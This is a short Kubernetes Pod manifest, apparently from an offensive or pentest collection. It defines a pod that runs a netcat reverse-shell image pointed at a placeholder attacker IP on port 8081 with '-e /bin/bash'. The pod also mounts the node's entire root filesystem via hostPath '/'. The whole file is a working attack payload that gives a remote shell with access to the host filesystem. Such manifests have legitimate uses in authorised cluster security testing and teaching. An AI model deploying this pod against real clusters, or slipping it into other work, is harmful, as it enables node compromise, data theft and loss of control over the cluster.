apiVersion: v1
kind: Pod
metadata:
  name: ncat-reverse-shell-pod
  labels:
    app: ncat
spec:
  containers:
  - name: ncat-reverse-shell
    image: <repository>/netcatreverseshell:latest
    volumeMounts:
    - mountPath: /host
      name: hostvolume
    args: ['<attackerip>', '8081', '-e', '/bin/bash']
  volumes:
  - name: hostvolume
    hostPath:
      path: /
      type: Directory
